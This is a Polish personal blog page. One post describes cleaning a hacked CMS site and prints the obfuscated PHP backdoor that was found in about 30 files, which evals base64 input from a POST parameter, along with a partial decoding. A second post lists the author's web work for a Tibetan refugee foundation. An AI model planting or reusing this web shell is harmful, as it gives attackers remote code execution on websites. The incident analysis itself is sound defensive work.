Hackowanie CMS-ów

Wreszcie się doczekałem ktoś włamał się na stronę którą przygotowałem dziś dzień czyszczenia z wirusów smile emoticon i zabezpieczania CMS-a. W tym krótkim wątku podsumuję w jaki sposób zabezpieczyć się przed włamaniem do CMS (Drupal i WordPress).

Site został najpierw spamowany. Przez nie wykasowany moduł edytora ckeditor. Podejrzany kod:

<?php $sF="PCT4BA6ODSE_";
 $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
 $s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n33beb2'];if(isset($s22)){eval($s21($s22));} ?>

Po zdekodowaniu wygląda to tak:

s21 = base64_decode
s22 =
strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]) = _POST
eval($s21($s22)) =

Zainfekowanych zostało około 30 plików.

Hits: 5

Projekty fundacji nyatri.org

Ulotka fundacji Nyatri (2017)

Celem Fundacji

jest organizacja wszechstronnej działalności w zakresie pomocy uchodźcom tybetańskim, ochrony zdrowia oraz ratowania życia, w tym wspierania i prowadzenia inicjatyw o charakterze zdrowotnym, edukacyjnym oraz charytatywnym, mającej na celu zachowanie przy życiu narodu tybetańskiego wraz z jego unikalnym w świecie dziedzictwem kulturowym.

[su_icon_text icon=”icon: chain” url=”http://nyatri.org”]http://nyatri.org[/su_icon_text]

Funkcje

  • Członek Zarządu Fundacji Nyatri 200x-20xx
  • Członek Rady Fundacji Nyatri maj 2015 – obecnie
Spotkanie z Rodzicami Serca 2016 w siedzibie fundacji Ocalenie
Spotkanie z Rodzicami Serca 2016 w siedzibie fundacji Ocalenie

Projekty

  • Administracja stroną informatyczną projektów fundacji.
  • Upgrade modułów i Joomla/WordPress.
  • Workflow i formularz zgłoszeniowy Adopicji Serca.
  • Promocja i integracja strony w mediach społecznościowych ([su_highlight]Facebook[/su_highlight], Google+, LinkedIn)
Logo fundacji Nyatri (2018)

Hits: 3

Proudly powered by WordPress | Theme: Baskerville 2 by Anders Noren.

Up ↑